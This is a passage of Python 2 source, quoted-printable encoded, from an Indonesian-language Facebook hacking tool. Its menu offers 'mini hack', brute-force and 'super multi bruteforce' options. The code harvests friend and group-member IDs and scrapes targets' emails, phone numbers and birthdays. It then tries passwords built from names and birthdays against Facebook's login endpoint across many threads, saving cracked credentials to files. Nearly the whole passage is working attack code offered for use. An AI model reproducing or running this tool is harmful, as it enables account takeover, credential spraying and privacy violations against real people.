33[1;97m+\033[1;95m z')
	jalan("\033[1;96m=C2=A4"*48)
        print
        bz =3D open('out/id_teman.txt', 'w')
        for a in z['data']:
            idteman.append(a['id'])
            bz.write(a['id'] + '\n')
            print '\r\x1b[1;96m [\x1b[1;97m=E2=80=A2\x1b[1;96m] \x1b[1;97m=
' + str(len(idteman)) + '  \033[1;96m=E2=97=8A\033[1;97m ',
            sys.stdout.flush()
            time.sleep(0.005)
            print '\x1b[1;97m' + a['id']

        bz.close()
        print '\n\x1b[1;97m [\x1b[1;96m\xe2\x9c\x93\x1b[1;97m] \33[3;1m\x1=
b[1;96msukses mengambil ID\33[0;1m '
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33=
[3;1m\x1b[1;96mtotal ID\x1b[1;97m :\x1b[1;93m %s' % len(idteman)
        done =3D raw_input('\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x=
1b[1;97m] \33[3;1m\x1b[1;96msimpan nama file\x1b[1;97m : \x1b[1;93m')
        os.rename('out/id_teman.txt', 'out/' + done)
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33=
[3;1m\x1b[1;96mfile tersimpan \x1b[1;97m: \x1b[1;93mout/' + done
	print
        exit()
    except IOError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mgagal membuat file'
	print
        exit()
    except (KeyboardInterrupt, EOFError):
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mterhenti ! '
	print
        exit()
    except KeyError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mgagal '
	print
        exit()
    except OSError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mfile anda tidak tersimpan !'
	print
        exit()
    except requests.exceptions.ConnectionError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mTidak ada koneksi !'
	print
        exit()
	
def idfrom_teman1():
    os.system('clear')
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print ' Token Invalid'
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        masuk()

    try:
        os.mkdir('out')
    except OSError:
        pass

    try:
        os.system('clear')
        print
	print
        idt =3D raw_input('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;97mUse=
r ID Target : \033[1;93m')
        try:
            jok =3D requests.get('https://graph.facebook.com/' + idt + '?a=
ccess_token=3D' + toket)
            op =3D json.loads(jok.text)
            print '\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;97mNama Akun  =
    : \x1b[1;93m' + op['name']
        except KeyError:
            print ' \x1b[1;91mID Publik Tidak Ada !'
            raw_input('\n\x1b[1;93m[\x1b[1;91mKembali\x1b[1;93m]')
            dump()

        r =3D requests.get('https://graph.facebook.com/' + idt + '?fields=
=3Dfriends.limit(50000)&access_token=3D' + toket)
        z =3D json.loads(r.text)
        print('\033[1;96m[\033[1;97m!\033[1;96m] \033[1;97mMENGAMBIL SEMUA=
 \033[1;96mID \033[1;97mTEMAN')
	print('\033[1;97mjika ingin berhenti mengambil ID tekan \033[1;95mctrl \0=
33[1;97m+\033[1;95m z')
	jalan("\033[1;96m=C2=A4"*48)
        print
        bz =3D open('out/id_teman_from_teman.txt', 'w')
        for a in z['friends']['data']:
            idfromteman.append(a['id'])
            bz.write(a['id'] + '\n')
            print '\r\x1b[1;96m [\x1b[1;97m=E2=80=A2\x1b[1;96m] \x1b[1;97m=
' + str(len(idfromteman)) + '  \033[1;96m=E2=97=8A\033[1;97m ',
            sys.stdout.flush()
            time.sleep(0.005)
            print '\x1b[1;97m' + a['id']

        bz.close()
        print '\n\x1b[1;97m [\x1b[1;96m\xe2\x9c\x93\x1b[1;97m] \33[3;1m\x1=
b[1;96msukses mengambil ID\33[0;1m '
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33=
[3;1m\x1b[1;96mtotal ID\x1b[1;97m :\x1b[1;93m %s' % len(idfromteman)
        done =3D raw_input('\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x=
1b[1;97m] \33[3;1m\x1b[1;96msimpan nama file\x1b[1;97m : \x1b[1;93m')
        os.rename('out/id_teman_from_teman.txt', 'out/' + done)
        print '\r\33[0;1m\x1b[1;97m [\x1b[1;96m\xe2\x80\xa2\x1b[1;97m] \33=
[3;1m\x1b[1;96mfile tersimpan \x1b[1;97m: \x1b[1;93mout/' + done
	print
        exit()
    except IOError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mgagal membuat file'
	print
        exit()
    except (KeyboardInterrupt, EOFError):
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mterhenti ! '
	print
        exit()
    except KeyError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mgagal '
	print
        exit()
    except OSError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mfile anda tidak tersimpan !'
	print
        exit()
    except requests.exceptions.ConnectionError:
        print '\33[0;1m\x1b[1;97m [\x1b[1;96m!\x1b[1;97m] \33[3;1m\x1b[1;9=
6mTidak ada koneksi !'
	print
        exit()		

def informasi():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    
    print
    print("\033[1;96m=C2=A4"*48)
    id =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMasukan =
ID/Nama\x1b[1;97m : \x1b[1;93m')
    print('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mTunggu sebentar \x1=
b[1;97m.....')
    r =3D requests.get('https://graph.facebook.com/me/friends?access_token=
=3D' + toket)
    cok =3D json.loads(r.text)
    for p in cok['data']:
        if id in p['name'] or id in p['id']:
            r =3D requests.get('https://graph.facebook.com/' + p['id'] + '=
?access_token=3D' + toket)
            z =3D json.loads(r.text)
            jalan ("\033[1;96m=C2=A4"*48)
	    time.sleep(0.07)
	    print
            try:
                jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNama\x=
1b[1;97m          :\x1b[1;93m ' + z['name'])
            except KeyError:
                jalan ('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;97mNama\x=
1b[1;97m          : \x1b[1;91mTidak ada')
            else:
                try:
                    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mID=
\x1b[1;97m            :\x1b[1;93m ' + z['id'])
                except KeyError:
                    jalan ('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;97m  =
          : \x1b[1;91mTidak ada')
                else:
                    try:
                        jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;9=
7mEmail\x1b[1;97m         :\x1b[1;93m ' + z['email'])
                    except KeyError:
                        jalan ('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;9=
7mEmail\x1b[1;97m         : \x1b[1;91mTidak ada')
                    else:
                        try:
                            jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b=
[1;97mNomor HP\x1b[1;97m      : ' + z['mobile_phone'])
                        except KeyError:
                            jalan ('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b=
[1;97mNomor HP\x1b[1;97m      : \x1b[1;91mTidak ada')
			else:
                            try:
                            	jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1=
b[1;97mLokasi\x1b[1;97m        :\x1b[1;93m ' + z['location']['name'])
                            except KeyError:
                            	jalan ('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1=
b[1;97mLokasi\x1b[1;97m        : \x1b[1;91mTidak ada')

                    try:
                        jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;9=
7mTanggal Lahir\x1b[1;97m :\x1b[1;93m ' + z['birthday'])
                    except KeyError:
                        jalan ('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;9=
7mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada')

                try:
                    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mSe=
kolah\x1b[1;97m       : ')
                    for q in z['education']:
                        try:
                            jalan ('\x1b[1;93m                   ~ \x1b[1;=
93m' + q['school']['name'])
                        except KeyError:
                            jalan ('\x1b[1;93m                   ~ \x1b[1;=
91mTidak ada')

                except KeyError:
                    pass

            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu()
    else:
        print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
        raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
        menu()


def menu_hack():
    os.system('clear')
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()

    os.system('clear')
    banner()
    print
    print
    print '\x1b[1;36;40m[\x1b[1;37;40m1\x1b[1;36;40m] \x1b[1;37;40mMini ha=
ck facebook (\x1b[1;92mtarget\x1b[1;97m)'
    print '\x1b[1;36;40m[\x1b[1;37;40m2\x1b[1;36;40m] \x1b[1;37;40mMulti b=
ruteforce facebook'
    print '\x1b[1;36;40m[\x1b[1;37;40m3\x1b[1;36;40m] \x1b[1;37;40mSuper m=
ulti bruteforce facebook'
    print '\x1b[1;36;40m[\x1b[1;37;40m4\x1b[1;36;40m] \x1b[1;37;40mBrutefo=
rce (\x1b[1;92mtarget\x1b[1;97m)'
    print '\x1b[1;37;40m[\x1b[1;36;40m0\x1b[1;37;40m] \x1b[1;36;40mKembali=
 ke MENU UTAMA'
    print
    hack_pilih()


def hack_pilih():
    hack =3D raw_input('\x1b[1;96m[\x1b[1;97m?\x1b[1;96m] \x1b[1;96mpilih =
:\x1b[1;93m ')
    if hack =3D=3D '':
    	print
        print ("\033[1;97mpilih yang benar.......!!!")
	print
        hack_pilih()
    else:
        if hack =3D=3D '1':
            mini()
        else:
            if hack =3D=3D '2':
                crack()
                hasil()
            else:
                if hack =3D=3D '3':
                    super()
                else:
                    if hack =3D=3D '4':
                        brute()
                    else:
                        if hack =3D=3D '0':
                            menu()
                        else:
                            print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + =
hack + ' \x1b[1;91mTidak ada'
                            hack_pilih()
         
def mini():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
	print
        print '\x1b[1;96m[\x1b[1;97mINFO\x1b[1;96m] \x1b[1;96mTarget harus=
 berteman dengan akun tumbal'
	print
        try:
            jalan ("\033[1;96m=C2=A4"*48)
	    id =3D raw_input('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mID targ=
et :\x1b[1;93m ')
	    r =3D requests.get('https://graph.facebook.com/' + id + '?access_toke=
n=3D' + toket)
            a =3D json.loads(r.text)
	    print '\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNama      : \x1b[1=
;93m' + a['name']
            jalan('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mTunggu sebe=
ntar.....')
            jalan ("\033[1;96m=C2=A4"*48)
	    print
            jalan('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mMemeriksa')
            time.sleep(2)
            jalan('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;97mKode keaman=
an')
            time.sleep(2)
            jalan('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mMohon Tungg=
u sebentar.....')
	    print
            pz1 =3D a['first_name'] + '123'
            data =3D urllib.urlopen('https://b-api.facebook.com/method/aut=
h.login?access_token=3D237759909591655%25257C0f140aabedfb65ac27a739ed1a2263=
b1&format=3Djson&sdk_version=3D2&email=3D' + id + '&locale=3Den_US&password=
=3D' + pz1 + '&sdk=3Dios&generate_session_cookies=3D1&sig=3D3f555f99fb61fcd=
7aa0c44f58f522ef6')
            y =3D json.load(data)
            if 'access_token' in y:
                jalan ('\x1b[1;91m[+] \x1b[1;92mDitemukan.')
                jalan ('\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[=
1;92mNama\x1b[1;97m     : ' + a['name'])
                jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;=
97m : ' + id)
                jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;=
97m : \x1b[1;97m' + pz1)
                raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
                menu_hack()
            else:
                if 'www.facebook.com' in y['error_msg']:
                    jalan ('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b[1;92mDi=
temukan.')
                    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;93mAk=
un kena Checkpoint')
                    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNa=
ma\x1b[1;97m     : ' + a['name'])
                    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mUs=
ername\x1b[1;97m : ' + id)
                    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mPa=
ssword\x1b[1;97m : \x1b[1;92m' + pz1)
                    raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]=
')
                    menu_hack()
                else:
                    pz2 =3D a['first_name'] + '12345'
                    data =3D urllib.urlopen('https://b-api.facebook.com/me=
thod/auth.login?access_token=3D237759909591655%25257C0f140aabedfb65ac27a739=
ed1a2263b1&format=3Djson&sdk_version=3D2&email=3D' + id + '&locale=3Den_US&=
password=3D' + pz2 + '&sdk=3Dios&generate_session_cookies=3D1&sig=3D3f555f9=
9fb61fcd7aa0c44f58f522ef6')
                    y =3D json.load(data)
                    if 'access_token' in y:
                        jalan ('\x1b[1;91m[+] \x1b[1;92mDitemukan.')
                	jalan ('\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b=
[1;92mNama\x1b[1;97m     : ' + a['name'])
                	jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1=
;97m : ' + id)
                	jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1=
;97m : \x1b[1;97m' + pz2)
                	raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
                        menu_hack()
                    else:
                        if 'www.facebook.com' in y['error_msg']:
                            jalan ('\x1b[1;96m[\x1b[1;97m+\x1b[1;96m] \x1b=
[1;92mDitemukan.')
			    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;93mAkun kena Check=
point')
			    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNama\x1b[1;97m =
    : ' + a['name'])
			    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mUsername\x1b[1;=
97m : ' + id)
			    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mPassword\x1b[1;=
97m : \x1b[1;92m' + pz2)
			    raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
                            menu_hack()
                        else:
                            pz3 =3D a['last_name'] + '123'
                            data =3D urllib.urlopen('https://b-api.faceboo=
k.com/method/auth.login?access_token=3D237759909591655%25257C0f140aabedfb65=
ac27a739ed1a2263b1&format=3Djson&sdk_version=3D2&email=3D' + id + '&locale=
=3Den_US&password=3D' + pz3 + '&sdk=3Dios&generate_session_cookies=3D1&sig=
=3D3f555f99fb61fcd7aa0c44f58f522ef6')
                            y =3D json.load(data)
                            if 'access_token' in y:
                                jalan ('\x1b[1;91m[+] \x1b[1;92mDitemukan.=
')
                		jalan ('\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1=
b[1;92mNama\x1b[1;97m     : ' + a['name'])
               	 		jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b=
[1;97m : ' + id)
                		jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[=
1;97m : \x1b[1;97m' + pz3)
                		raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
                                menu_hack()
                            else:
                                if 'www.facebook.com' in y['error_msg']:
                                    jalan ('\x1b[1;96m[\x1b[1;97m+\x1b[1;9=
6m] \x1b[1;92mDitemukan.')
				    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;93mAkun kena Chec=
kpoint')
				    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNama\x1b[1;97m=
     : ' + a['name'])
				    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mUsername\x1b[1=
;97m : ' + id)
				    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mPassword\x1b[1=
;97m : \x1b[1;92m' + pz3)
				    raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
                                    menu_hack()
                                else:
                                    lahir =3D a['birthday']
                                    pz4 =3D lahir.replace('/', '')
                                    data =3D urllib.urlopen('https://b-api=
.facebook.com/method/auth.login?access_token=3D237759909591655%25257C0f140a=
abedfb65ac27a739ed1a2263b1&format=3Djson&sdk_version=3D2&email=3D' + id + '=
&locale=3Den_US&password=3D' + pz4 + '&sdk=3Dios&generate_session_cookies=
=3D1&sig=3D3f555f99fb61fcd7aa0c44f58f522ef6')
                                    y =3D json.load(data)
                                    if 'access_token' in y:
                                        jalan ('\x1b[1;91m[+] \x1b[1;92mDi=
temukan.')
                			jalan ('\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x=
1b[1;92mNama\x1b[1;97m     : ' + a['name'])
                			jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b=
[1;97m : ' + id)
                			jalan ('\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b=
[1;97m : \x1b[1;97m' + pz4)
               		 		raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]=
')
                                        menu_hack()
                                    else:
                                        if 'www.facebook.com' in y['error_=
msg']:
                                            jalan ('\x1b[1;96m[\x1b[1;97m+=
\x1b[1;96m] \x1b[1;92mDitemukan.')
					    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;93mAkun kena Che=
ckpoint')
					    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mNama\x1b[1;97=
m     : ' + a['name'])
					    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mUsername\x1b[=
1;97m : ' + id)
					    jalan ('\x1b[1;96m[\x1b[1;97m!\x1b[1;96m] \x1b[1;97mPassword\x1b[=
1;97m : \x1b[1;92m' + pz4)
					    raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
                                            menu_hack()
                                        else:
                                            print '\x1b[1;91m[!] Maaf, gag=
al membuka password target :('
                                            print '\x1b[1;91m[!] Cobalah d=
engan cara lain.'
                                            raw_input('\n\x1b[1;96m[ \x1b[=
1;97mKembali \x1b[1;96m]')
                                            menu_hack()
        except KeyError:
            print '\x1b[1;91m[!] Terget tidak ditemukan'
            raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
            menu_hack()


def crack():
    global file
    global idlist
    global passw
    os.system('reset')
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    else:
        os.system('reset')
        print logo
        print("\033[1;96m=C2=A4"*48)
        idlist =3D raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID  \x1b[1;91m:=
 \x1b[1;97m')
        passw =3D raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: =
\x1b[1;97m')
        try:
            file =3D open(idlist, 'r')
            jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b=
[1;97m...')
            for x in range(40):
                zedd =3D threading.Thread(target=3Dscrak, args=3D())
                zedd.start()
                threads.append(zedd)

            for zedd in threads:
                zedd.join()

        except IOError:
            print '\x1b[1;91m[!] File tidak ditemukan'
            raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
            menu_hack()

def scrak():
    global back
    global berhasil
    global cekpoint
    global gagal
    global up
    try:
        buka =3D open(idlist, 'r')
        up =3D buka.read().split()
        while file:
            username =3D file.readline().strip()
            url =3D 'https://b-api.facebook.com/method/auth.login?access_t=
oken=3D237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=3Djson=
&sdk_version=3D2&email=3D' + username + '&locale=3Den_US&password=3D' + pas=
sw + '&sdk=3Dios&generate_session_cookies=3D1&sig=3D3f555f99fb61fcd7aa0c44f=
58f522ef6'
            data =3D urllib.urlopen(url)
            mpsh =3D json.load(data)
            if back =3D=3D len(up):
                break
            if 'access_token' in mpsh:
                bisa =3D open('Berhasil.txt', 'w')
                bisa.write(username + ' | ' + passw + '\n')
                bisa.close()
                berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1=
;97m] ' + username + ' | ' + passw)
                back +=3D 1
            else:
                if 'www.facebook.com' in mpsh['error_msg']:
                    cek =3D open('Cekpoint.txt', 'w')
                    cek.write(username + ' | ' + passw + '\n')
                    cek.close()
                    cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x=
1b[1;97m] ' + username + ' | ' + passw)
                    back +=3D 1
                else:
                    gagal.append(username)
                    back +=3D 1
            sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91=
m] \x1b[1;92mCrack    \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x=
1b[1;97m ' + str(len(up)) + ' =3D>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + st=
r(len(berhasil)) + ' \x1b[1;97m=3D>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + =
str(len(cekpoint)))
            sys.stdout.flush()

    except IOError:
        print '\n\x1b[1;91m[!] Koneksi terganggu'
        time.sleep(1)
    except requests.exceptions.ConnectionError:
        print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'

def hasil():
    print
    print 40 * '\x1b[1;97m\xe2\x95\x90'
    for b in berhasil:
        print b

    for c in cekpoint:
        print c

    print
    print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
    keluar()


def super():
    global toket
    os.system('reset')
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m[!] Token tidak ditemukan'
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()

    os.system('reset')
    print logo
    print 40 * '\x1b[1;97m\xe2\x95\x90'
    print '\x1b[1;37;40m1. Crack dari daftar Teman'
    print '\x1b[1;37;40m2. Crack dari member Grup'
    print '\x1b[1;31;40m0. Kembali'
    print
    pilih_super()


def pilih_super():
    peak =3D raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
    if peak =3D=3D '':
        print '\x1b[1;91m[!] Jangan kosong'
        pilih_super()
    else:
        if peak =3D=3D '1':
            os.system('reset')
            print logo
            print 40 * '\x1b[1;97m\xe2\x95\x90'
            jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m..=
.')
            r =3D requests.get('https://graph.facebook.com/me/friends?acce=
ss_token=3D' + toket)
            z =3D json.loads(r.text)
            for s in z['data']:
                id.append(s['id'])

        else:
            if peak =3D=3D '2':
                os.system('reset')
                print logo
                print 40 * '\x1b[1;97m\xe2\x95\x90'
                idg =3D raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup   \x1b[=
1;91m:\x1b[1;97m ')
                try:
                    r =3D requests.get('https://graph.facebook.com/group/?=
id=3D' + idg + '&access_token=3D' + toket)
                    asw =3D json.loads(r.text)
                    print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x=
1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
                except KeyError:
                    print '\x1b[1;91m[!] Grup tidak ditemukan'
                    raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]=
')
                    super()

                re =3D requests.get('https://graph.facebook.com/' + idg + =
'/members?fields=3Dname,id&limit=3D999999999&access_token=3D' + toket)
                s =3D json.loads(re.text)
                for i in s['data']:
                    id.append(i['id'])

            else:
                if peak =3D=3D '0':
                    menu_hack()
                else:
                    print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + '=
 \x1b[1;91mTidak ada'
                    pilih_super()
    print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str=
(len(id))
    jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m..=
.')
    titik =3D ['.   ', '..  ', '... ']
    for o in titik:
        print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92m=
Crack \x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(1)

    print
    print 40 * '\x1b[1;97m\xe2\x95\x90'

    def main(arg):
        user =3D arg
        try:
            a =3D requests.get('https://graph.facebook.com/' + user + '/?a=
ccess_token=3D' + toket)
            b =3D json.loads(a.text)
            pass1 =3D b['first_name'] + '123'
            data =3D urllib.urlopen('https://b-api.facebook.com/method/aut=
h.login?access_token=3D237759909591655%25257C0f140aabedfb65ac27a739ed1a2263=
b1&format=3Djson&sdk_version=3D2&email=3D' + user + '&locale=3Den_US&passwo=
rd=3D' + pass1 + '&sdk=3Dios&generate_session_cookies=3D1&sig=3D3f555f99fb6=
1fcd7aa0c44f58f522ef6')
            q =3D json.load(data)
            if 'access_token' in q:
                print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + =
user + ' | ' + pass1
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] =
' + user + ' | ' + pass1
                else:
                    pass2 =3D b['first_name'] + '12345'
                    data =3D urllib.urlopen('https://b-api.facebook.com/me=
thod/auth.login?access_token=3D237759909591655%25257C0f140aabedfb65ac27a739=
ed1a2263b1&format=3Djson&sdk_version=3D2&email=3D' + user + '&locale=3Den_U=
S&password=3D' + pass2 + '&sdk=3Dios&generate_session_cookies=3D1&sig=3D3f5=
55f99fb61fcd7aa0c44f58f522ef6')
                    q =3D json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;9=
7m] ' + user + ' | ' + pass2
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b=
[1;97m] ' + user + ' | ' + pass2
                        else:
                            pass3 =3D b['last_name'] + '123'
                            data =3D urllib.urlopen('https://b-api.faceboo=
k.com/method/auth.login?access_token=3D237759909591655%25257C0f140aabedfb65=
ac27a739ed1a2263b1&format=3Djson&sdk_version=3D2&email=3D' + user + '&local=
e=3Den_US&password=3D' + pass3 + '&sdk=3Dios&generate_session_cookies=3D1&s=
ig=3D3f555f99fb61fcd7aa0c44f58f522ef6')
                            q =3D json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93=
\x1b[1;97m] ' + user + ' | ' + pass3
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c=
\x9a\x1b[1;97m] ' + user + ' | ' + pass3
                                else:
                                    lahir =3D b['birthday']
                                    pass4 =3D lahir.replace('/', '')
                                    data =3D urllib.urlopen('https://b-api=
.facebook.com/method/auth.login?access_token=3D237759909591655%25257C0f140a=
abedfb65ac27a739ed1a2263b1&format=3Djson&sdk_version=3D2&email=3D' + user +=
 '&locale=3Den_US&password=3D' + pass4 + '&sdk=3Dios&generate_session_cooki=
es=3D1&sig=3D3f555f99fb61fcd7aa0c44f58f522ef6')
                                    q =3D json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;97m[\x1b[1;92mOK\xe2=
\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
                                    else:
                                        if 'www.facebook.com' in q['error_=
msg']:
                                            print '\x1b[1;97m[\x1b[1;93mCP=
\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
        except:
            pass

    p =3D ThreadPool(30)
    p.map(main, id)
    print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
